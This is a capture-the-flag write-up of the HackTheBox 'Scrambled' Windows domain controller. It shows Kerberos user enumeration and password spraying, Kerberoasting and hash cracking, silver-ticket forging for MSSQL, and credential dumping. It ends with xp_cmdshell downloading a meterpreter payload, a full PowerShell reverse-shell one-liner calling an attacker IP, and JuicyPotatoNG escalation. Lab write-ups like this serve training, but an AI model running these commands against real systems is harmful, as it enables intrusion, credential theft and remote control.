🟨HTB - Scrambled
https://app.hackthebox.com/machines/Scrambled

General Information
Machine Name: Scrambled
Machine IP: 10.129.85.148
Operating System: Windows
Difficulty: Medium
Release Date: 11 Jun 2022
Enumeration
Ping to obtain the return route
We ping the target machine to verify connectivity and obtain route information, using the -R option to include the return route:
ping -c 1 10.129.85.148 -R

A TTL (Time To Live) value of 127 can indicate that the operating system of the target machine is Windows. TTL is a field in IP packets that limits how long a packet can remain on a network before being discarded. Windows sets the TTL of its IP packets to 128 by default, which is decremented to 127 after passing through one network hop.
Port scan with Nmap
Next, we run a port scan with Nmap to identify the open ports on the target machine. We use -p- to scan all ports, --open to show only open ports, -sS for a TCP SYN scan, --min-rate 5000 to set the minimum packet rate and -vvv for high verbosity. We also use -n to disable DNS resolution, -Pn to skip the ping scan, and -oG allPorts to save the output to a file in greppable format, which we then pass to our extractPorts function:
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.85.148 -oG allPorts
extractPorts allPorts
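
The extractPorts helper used above is not shown on this page. The following is an added example (not the author's function) of what such a helper has to do with the greppable file: read the "Ports:" field of each "Host:" line and build the comma-separated list for the later -p argument. The names extract_ports and port_argument and the sample data are assumptions made for this example.

```python
# Constructed sample of `nmap -oG` output (not the real allPorts file from this scan).
SAMPLE = (
    "# Nmap 7.94SVN scan initiated as: nmap -p- --open -sS -n -Pn -oG allPorts 10.129.85.148\n"
    "Host: 10.129.85.148 ()\tStatus: Up\n"
    "Host: 10.129.85.148 ()\tPorts: 53/open/tcp//domain///, 80/open/tcp//http///, "
    "88/open/tcp//kerberos-sec///, 4411/open/tcp//found///, "
    "137/filtered/udp//netbios-ns///\tIgnored State: filtered (65531)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


def extract_ports(grepable, proto="tcp"):
    """Return {host: sorted open ports} parsed from greppable (-oG) Nmap output."""
    result = {}
    for line in grepable.splitlines():
        if not line.startswith("Host: "):
            continue  # skip comment lines such as "# Nmap done"
        fields = line.split("\t")           # fields are tab-separated
        host = fields[0].split()[1]         # "Host: <ip> (<name>)"
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            # Each entry: port/state/protocol/owner/service/rpcinfo/version/
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/")
                if len(parts) >= 3 and parts[1] == "open" and parts[2] == proto:
                    result.setdefault(host, set()).add(int(parts[0]))
    return {host: sorted(ports) for host, ports in result.items()}


def port_argument(ports):
    """Format a port list the way `nmap -p` expects it."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for host, ports in extract_ports(SAMPLE).items():
        print(host, port_argument(ports))
```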

Detailed scan with Nmap
We then run a more detailed scan of the identified ports using the -sCV option for version detection and service enumeration scripts. Specifically, we specify the ports to scan with -p __PORTS__ (replacing __PORTS__ with the ports identified in the previous step) and save the output to a text file named targeted:
sudo nmap -sCV -pPORTS 10.129.85.148 -oN targeted
# Nmap 7.94SVN scan initiated Tue Apr 2 18:15:21 2024 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49699,49704,60649 -sCV -oN targeted 10.129.85.148
Nmap scan report for 10.129.85.148
Host is up (0.20s latency).
Bug in ms-sql-ntlm-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 22:15:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.85.148:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-02T21:44:08
|_Not valid after: 2054-04-02T21:44:08
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
60649/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-04-02T22:18:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 2 18:18:50 2024 -- 1 IP address (1 host up) scanned in 208.81 seconds
Modifying /etc/hosts
To add the entry "10.129.85.148 scrm.local" to the /etc/hosts file, you can use the following command in the terminal:
echo "10.129.85.148 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts
Username Bruteforce with Kerbrute
kerbrute userenum --dc dc1.scrm.local -d scrm.local -t 2000 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o users

Directory Bruteforce with Dirsearch
dirsearch -u scrm.local

Analyzing the scrm.local page

http://scrm.local/supportrequest.html
http://scrm.local/newuser.html
http://scrm.local/salesorders.html
http://scrm.local/passwords.html

In passwords.html we can see that it says the password is to be the same as the username. So I will try kerbrute again to see whether the credential I obtained works.
Password Bruteforce with Kerbrute
kerbrute passwordspray -d scrm.local --dc dc1.scrm.local users ksimpson

Impacket
We now have a valid user, so we continue the enumeration with impacket

We start with getTGT.py
python3 getTGT.py scrm.local/ksimpson:ksimpson

export KRB5CCNAME=ksimpson.ccache
klist

Next we use GetUserSPNs.py
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass

python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass -request
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$05ba11933eb6ee366b244a4aa5faeb53$
John the Ripper to crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

ksimpson:ksimpson
sqlsvc:Pegasus60:MSSQLSvc/dc1.scrm.local
python3 mssqlclient.py dc1.scrm.local -k

So we will try everything again (starting from getTGT.py) but now with the credentials sqlsvc:Pegasus60.
python3 getTGT.py scrm.local/sqlsvc:Pegasus60
export KRB5CCNAME=sqlsvc.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k

NTLM Hash
We convert "Pegasus60" to an NTLM hash with an online tool (browserling.com/tools/ntlm-hash)
Pegasus60:b999a16500b87d17ec7f2e2a68778f05
And we add it to our credentials list in creds.txt

getPac.py
python3 getPac.py -targetUser Administrator scrm.local/ksimpson:ksimpson
Impacket v0.11.0 - Copyright 2023 Fortra
KERB_VALIDATION_INFO
LogonTime:
dwLowDateTime: 3436097167
dwHighDateTime: 31098182
LogoffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
KickOffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
PasswordLastSet:
dwLowDateTime: 2585823167
dwHighDateTime: 30921784
PasswordCanChange:
dwLowDateTime: 3297396671
dwHighDateTime: 30921985
PasswordMustChange:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
EffectiveName: 'administrator'
FullName: ''
LogonScript: ''
ProfilePath: ''
HomeDirectory: ''
HomeDirectoryDrive: ''
LogonCount: 259
BadPasswordCount: 0
PrimaryGroupId: 513
GroupCount: 5
GroupIds:
[
RelativeId: 513
Attributes: 7 ,
RelativeId: 512
Attributes: 7 ,
RelativeId: 520
Attributes: 7 ,
RelativeId: 518
Attributes: 7 ,
RelativeId: 519
Attributes: 7 ,
]
UserFlags: 544
UserSessionKey:
Data: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
LogonServer: 'DC1'
LogonDomainName: 'SCRM'
LogonDomainId:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
LMKey: b'\x00\x00\x00\x00\x00\x00\x00\x00'
UserAccountControl: 16912
SubAuthStatus: 0
LastSuccessfulILogon:
dwLowDateTime: 0
dwHighDateTime: 0
LastFailedILogon:
dwLowDateTime: 0
dwHighDateTime: 0
FailedILogonCount: 0
Reserved3: 0
SidCount: 1
ExtraSids:
[
Sid:
Revision: 1
SubAuthorityCount: 1
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x12'
SubAuthority:
[
2,
]
Attributes: 7 ,
]
ResourceGroupDomainSid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
ResourceGroupCount: 1
ResourceGroupIds:
[
RelativeId: 572
Attributes: 536870919 ,
]
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
0000 10 00 00 00 ED F9 BD 22 BE 45 B3 80 6A 22 04 A4 .......".E..j"..
We save the Domain SID in our credentials list:

LDAP Search
ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL' | grep -i sid

Script base64SID to String
import base64
import struct
import sys

def sid_to_string(raw):
    """Convert a binary SID (e.g. an LDAP objectSid value) to its S-1-... string form."""
    revision, count = raw[0], raw[1]
    assert revision == 1, "unexpected SID revision"
    authority = int.from_bytes(raw[2:8], "big")  # 48-bit big-endian identifier authority
    subs = struct.unpack(f"<{count}L", raw[8:8 + 4 * count])  # little-endian sub-authorities
    return f"S-{revision}-{authority}" + "".join(f"-{x}" for x in subs)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("Uso: python3 tosid.py base64SID")
    try:
        print(f"SID decodificado: {sid_to_string(base64.b64decode(sys.argv[1]))}")
    except Exception as e:
        print(f"Error: {e}")
python3 tosid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uXVAYAAA==

grep S-1-5-21-2743207045-1827831105-2542523200 creds.txt

ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL' | less
ksimpson

ticketer.py
python3 ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local

export KRB5CCNAME=Administrator.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k

Credential extraction from the DB
SELECT name FROM sys.databases;
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.UserImport;

MiscSvc:ScrambledEggs9900
sqlsvc:Pegasus60
ksimpson:ksimpson

MSFVenom Reverse Shell
xp_cmdshell curl 10.10.15.21:8888/3434.exe -o %temp%\3434.exe
xp_cmdshell %temp%\3434.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3434 -f exe -o 3434.exe
python3 -m http.server 8888
nc -lvnp 7777

We then notice that the SeImpersonatePrivilege privilege is Enabled.

This means we can perform a privilege escalation with JuicyPotatoNG.
Privilege escalation with JuicyPotatoNG
cd %programdata%
curl 10.10.15.21:8888/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
python3 -m http.server 8888


We will use the Invoke-PowerShellTcpOneLine.ps1 shell, modify it (the LHOST and LPORT) and then encode it in base64, to then download it onto the Windows machine in %programdata%.
$client = New-Object System.Net.Sockets.TCPClient('10.10.15.21',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 -w 0
cd %programdata%
curl 10.10.15.21:8888/t.bat -o t.bat
powershell
.\JuicyPotatoNG.exe -t * -p C:\ProgramData\t.bat
nc -nvlp 6666

